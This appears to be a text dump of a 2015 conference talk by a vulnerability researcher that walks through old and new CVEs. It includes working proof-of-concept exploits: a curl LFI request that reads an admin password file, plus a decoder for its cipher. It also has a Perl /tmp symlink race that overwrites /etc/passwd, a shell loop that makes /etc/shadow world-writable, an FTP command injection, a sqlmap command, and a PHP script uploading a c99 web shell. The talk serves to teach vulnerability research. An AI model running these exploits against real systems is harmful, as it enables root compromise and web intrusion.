Post on 11-Jan-2017
Fun with Exploits Old and NewHow software is expected to behave, how it really behaves and how we can exploit it
Larry W. Cashdollar11/13/2015
V1.9
Who Am I• 15 years at Akamai Technologies• Hobbyist Vulnerability Researcher• 100+ Vulnerabilities discovered• Formerly Unix Systems Administrator 17 years • Penetration Tester Back in Late 90s• Enjoy Writing and Breaking Code
• This is my second time speaking in public
Terminology
• CVE – Common Vulnerabilities and Exposure• Root shell – gaining access to administrative
user on Unix system• Web shell – a web based shell used to access
the system via HTTP• Vulnerability – A flaw in a piece of software• PoC – Proof of Concept
What is this all about?
• Concepts• Methodologies• Mind set• How can I break this?
• Think like a hacker
Why bother hacking stuff?
• Improves software security • Improves stability• It’s like solving a puzzle• Can be a lot of fun• Improves your skills• And……..
Exploiting a vulnerability you found feels like
Some common Vulnerabilities
• LFI (Local File Inclusion)• RFI (Remote File Inclusion)• RCE (Remote Command Execution)• Race Condition• SQL Injection• XSS (Cross Site Scripting)• Command Injection
Concepts
• Unchecked User Input• User Input is expected to behave • Abuse Program Flow• Unintended functionality• Abuse software privilege
Examples: Old
IRIX Midikeys: CVE 1999-0765
CVE: 1999-0765 setuid root binary abuse
• Binary executes with root privileges
• Allows modification of sensitive system files
Exploit CVE-1999-0765
• Open /etc/passwd as a .wav file• Or export WINEDITOR=/usr/X11/bin/xterm
Sawmill LFI & weak encryption CVE-2000-0589 & 0588
• Log analysis server listens on port 8987• LFI can read first line of any word readable file• Admin password stored in local file• Admin password encrypted with custom
algorithm
Exploiting CVE-2000-0589 & 0588 • $ curl http://192.168.1.65:8987/sawmill?rfcf+%22/etc
/sawmill/adminpwd.db%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
• Returns encrypted password Am@duZw• Simple substitution cypher
• Wrote code to decrypt… for my palm pilot IIIxe
PoC for CVE-2000-0589 & 0588 1. #include <stdio.h>2. 3. char alpha ="abcdefghijklmnopqrstuvwxyz0123456789!@$%^&()_+~<>?:\"{}|"; 4. char *encode="=GeKMNQS~TfUVWXY[abcygimrs\"$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";5. 6. int7. main (int argc, char **argv)8. {9. 10. int x, y;11. char cypher[128];12. 13. strncpy (cypher, argv[1], 128);14. 15. for (x = 0; x < strlen (cypher); x++) {16. 17. for (y = 0; y < strlen (encode); y++)18. if (cypher[x] == encode[y]){19. printf ("%c", alpha[y]);20. break;21. }22. }23. 24. printf("\n\"+\" could also be a space [ ]\n");25. }
• Decrypted password was ‘wookie’• Access to modify administrative control panel• Developer gave me a free license
Solaris catman file clobbering vulnerability CVE-2000-0095
• Creates files in /tmp insecurely • Uses guessable filenames• Doesn’t check to see if file already exists• Creates files in /tmp as /tmp/sman_PID• We can guess next filename and symlink to
/etc/passwd
PoC1. #!/usr/local/bin/perl -w 2. # http://vapid.dhs.org 3. $clobber = "/etc/passwd"; 4. #file to clobber5. $X=getpgrp(); 6. $Xc=$X; 7. #Constant 8. $Y=$X+1000;9. #Constant 10. while($X < $Y) { 11. print "Linking /tmp/sman_$X to $clobber :"; 12. # Change $clobber to what you want to clobber. 13. if (symlink ($clobber, "/tmp/sman_$X")) { 14. print "Sucess\n"; 15. } else 16. { 17. print "failed, Busy system?\n";18. } 19. $X=$X+1; 20. } 21. #Watch /tmp and see if catman is executed in time. 22. while(1) { 23. $list = "/usr/bin/ls -l /tmp | grep sman|grep root |"; 24. open (list,$list) or "die cant open ls...\n"; 25. while(<list>) { 26. @args = split "_",$_; 27. chop ($args[1]); 28. if ($args[1] >= $Xc && $args[1] <= $Y)29. { 30. print "Looks like pid $args[1] is the winner\n cleaning....\n";31. `/usr/bin/rm -f /tmp/sman*`; 32. exit(1); 33. } 34. } 35. }
Exploit Results
• /etc/passwd overwritten with contents of sman_pid
• System hosed
Exploits: New
Centrify CVE-2012-6348 /tmp race condition local root
• Administrative control daemon for system management
• Creates a file in /tmp as centrify.cmd.0• Executes that file as shell script!• Executes as root!
CVE-2012-6348 PoC Wins race condition 50% of the time:$ while (true) ; do echo "chmod 777 /etc/shadow" >> /tmp/centrify.cmd.0; done
After the system is refreshed via administrative control job:
$ ls -l /etc/shadow-rwxrwxrwx 1 root shadow 1010 Dec 7 21:57 /etc/shadow
CVE-2012-6348 Better PoC
• Wins race condition 100% of the time• Written in C• Uses inotify() to detect file modification and
creation• Too long to display here
Ftpd ruby gem command injection CVE-2013-2512
• FTP server developed in ruby• Code examination reveals remote command injection
208 def ls(ftp_path, option)209 path = expand_ftp_path(ftp_path)210 dirname = File.dirname(path)211 filename = File.basename(path)212 command = [213 'ls',214 option,215 filename, <-- unsanitized user controlled input216 '2>&1',217 ].compact.join(' ')218 if File.exists?(dirname) <- file has to exist to exec ls command219 list = Dir.chdir(dirname) do220 `{command}` <-- passed to shell here
CVE-2013-2512 PoC$ ftp localhostConnected to localhost.220 ftpdName (localhost:root): anonymous331 Password requiredPassword:230 Logged inRemote system type is UNIX.Using binary mode to transfer files.* I already created the filename foobar by uploading a fileftp> ls foobar;id200 PORT command successful150 Opening ASCII mode data connection-rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdfuid=0(root) gid=0(root) groups=0(root)226 Transfer complete
wp-powerplaygallery vulnerable SQL injection code CVE 2015-5599
131: $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` ) VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST['name']."',1,'','NULL')";
133 : $wpdb->query($query);
Blind SQLi Exploit
• Sqlmap
$ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1” —dbms mysql –level 5 –risk 3
wp-powerplaygallery vulnerable RFI Code CVE-2015-5681
50 $targetDir = $upload_dir['basedir'] . '/power_play/'.$_REQUEST['albumid'].'_ uploadfolder'; 51 $cleanupTargetDir = true; // Remove old files 52 $maxFileAge = 5 * 3600; // Temp file age in seconds 53 54 // Create target dir 55 if (!file_exists($targetDir)) { 56 @mkdir($targetDir); 57 }.148: // Read binary input stream and append it to temp file149: if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {150: die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');151: }. 158: while ($buff = fread($in, 4096)) {159: fwrite($out, $buff);160: }
RFI Exploit Requirements
• POST request• Variable albumid must point at existing album
in database• File to upload must exist locally• Use c99 shell as our payload• file variable contains payload with local full
path• name variable contains our filename
PoC Exploit1. <?php2. $target_url =
'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';3. $file_name_with_full_path = '/var/www/shell.php’;4. echo "POST to $target_url $file_name_with_full_path";5. $post = array('albumid'=>’4' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);6. $ch = curl_init();7. curl_setopt($ch, CURLOPT_URL,$target_url);8. curl_setopt($ch, CURLOPT_POST,1);9. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);10. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);11. $result=curl_exec ($ch);12. curl_close ($ch);13. echo "<hr>";14. echo $result;15. echo "<hr>";16. ?>